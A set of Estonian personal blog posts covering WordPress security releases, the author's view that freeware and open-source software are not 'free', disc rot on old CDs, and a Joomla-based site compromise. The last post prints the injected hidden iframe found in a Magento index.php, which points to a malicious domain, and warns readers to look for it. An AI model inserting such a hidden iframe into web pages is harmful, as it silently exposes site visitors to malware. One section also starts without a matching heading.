Wordpress

Kes arvas, et pääseb enne loetud päevade jooksul saabuvat suuremat versioonimuutust (v3.1) oma WordPressi installatsiooni uuendamisest, see arvaku uuesti. Vaid paar päeva pärast viimase (v3.0.2) veaparanduse ilmumist tõstis pead veel üks turvakonarus, mis seekord lubab mittelokaalsetel pahatahtlikel kasutajatel soovi korral teha asju, milleks neil õigusi ei ole.

Uusima versiooni leiab WordPressi koduleheküljelt ning soovi korral on seda võimalik alla laadida ka administreerimisliidese automaatse paigaldaja abil.

Wordpress

Meeldetuletuseks niipalju, et järgmise suurema versiooniuuenduseni (v3.1) on jäänud vaid paar nädalat, on WordPressi tiim väljastanud parandusversiooni v3.0.2. Eelkõige on see uuendus vajalik nendele, kes kasutavad oma keskkonnas rohkem kui ühte sisuautorit ning mitte kõik neist pole samade õigustega. Selgub, et väiksemate õigustega kasutajal on võimalik WordPressi vigu kasutades endale suuremaid õiguseid kaaperdada ja potentsiaalselt sellega kurja teha.

Miks ma sellest räägin? Ma räägin seda sellepärast, et sõna kasutus või väärkasutus mõjutab seda kuidas inimene suhtub ühte või teise tootesse. Tasuta tarkvara ehk freeware ei pruugi olla automaatselt avatud lähtekoodiga ega ka "vaba" vara. Näiteks Oracle Express (Oracle Database XE) on tasuta tarkvara, kuna selle eest ei pea sentigi lauale veeretama, ometigi pole see "vaba", sest Oracle hoiab endale kõik sellega seotud õigused. Teisest küljest võttes ei tohi unustada, et isegi kui tootega antakse kaasa lähtekood, ei pruugi see seda automaatselt "vabaks" teha. Näiteks praktiliselt kogu PHP tasuline tarkvara on avatud lähtekoodiga ja ometigi mitte "vaba".

Õigupoolest ei nimetaks ma vabaks varaks ka ühtegi GPL litsentsiga tarkvara, sest GPL seab paika päris jõhkrad reeglid kuidas seda tarkvara võib või ei või kasutada. Minu silmis on vabavara vaid public domain tarkvara, mille omaniku ja litsentsitingimusi kas ei ole võimalik tuvastada või on omanik loobunud kõikidest õigustest sellele. Taolist vara võib kasutada kuidas pähe tuleb -- laiendada, muuta, müüa (juhul kui ostja leiab), jagada, jne. Kui omanik on teada siis võib talle viidata, aga ka selle jaoks pole mingit kohustust.

Nagu olen ma jõudnud välja punkti, et enamus tarkvara, mida traditsiooniliselt kiputakse Eestis vabavaraks nimetama ei ole teps mitte vaba, vaid hoopis a) avatud lähtekoodiga (open source) ja b) tasuta (freeware).

Disc rot

Pakkisin hiljuti ühe kasti lahti, mis sisaldas erinevatel aegadel sinna paigutatud andmeid, põletatuna CD-de ja DVD-de peale. Ma proovisin paari vanemat neist lugeda, aga edu selles valdkonnas oli üsna vahelduv -- üle 10 aasta tagasi kirjutatud CD-d ei pruugi sugugi enam loetavad olla. Üks termin, mida sellistel puhkudel kasutatakse on disc rot, ehk kettakõdu.

Seoses sellega tekkiski mul küsimus: kas Mac OS-i jaoks on olemas mingit tarkvara, mis võimaldab selliseid kettaid tuvastada. Ma pean silmas seda, et pistad ketta masinasse, arvuti suristab natuke aega ja ütleb, et sellelt kettalt on lugemisega raskusi. Taoline asi võimaldab mul tuvastada säilivusprobleeme juba algfaasis, teha vajalikust kraamist koopiaid ja mittevajaliku kraami ilma igasuguste südametunnistusepiinadeta prügikasti toimetada.

Joomla

Kuradi raisakurat! Teate, alalõpmata kirjutatakse õudusjuttu sellest, kuidas üks või teine viirus kurja teeb ja kuidas üks või teine worm kuskil asju vasakule tõstab. Enamasti on need kirjutatud inimeste poolt, kes teavad sellistest asjadest kolmandate inimeste vahendusel ja kelle eesmärk on pakkuda põnevust inimestele, kes jutust aru ei saa. Samad inimesed kirjutavad lehtedesse ka seiklusjutte sellest, kuidas "Arctic Sea"-ga tiibrakette veetakse. Intrigeeriv, aga peaaegu alati ainult teoreetiline lugemine.

Täna siis märkasin, et millegipärast minu mõlemad Magento installatsioonid on käpa maha pannud veateatega, mis viitab justkui oleks programmikood vigane. Viskasin Magento index.php-le pilgu peale ja etskae: faili lõppu on tekkinud iseeneseslikult järgnev rida:

<iframe src="http://google-analyze.org/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Paanika! Kiire otsing näitas, et tegemist on selge pahavaraga, mis kuidagi mu masinasse on pugenud ja seal oma valgustkartvaid tegusi sooritab. Edasine otsing viitas sellele, et suure tõenäosusega on tegemist ka SQL injectionist tingitud rünnakuga. Veelgi edasisem otsing tuvastas masinast mingil iidsel ajal sinna testimiseks üles pandud Joomla installatsiooni, mis osutuski ründevektori alguspunktiks.

Soovitus nüüd kõigile, kes Joomlat kasutavad. Vaadake, ega teil kusagil failides iframe-ga algavat rida ei ole, mida te ei mäleta sinna pannud olevat. See aadress, mis src sees on, võib olla teine, kuid suures plaanis peaks välimus umbes sama olema. Minu puhul jäi see muudatus vahele ainult Magento eripärade tõttu, enamustel jääkski see ilmselt kahe silma vahele. Joomla on meil üsna levinud tarkvara ja ma ei usu mitte, et igaüks viitsib oma installatsioone regulaarselt uuendada.

Update early, update often!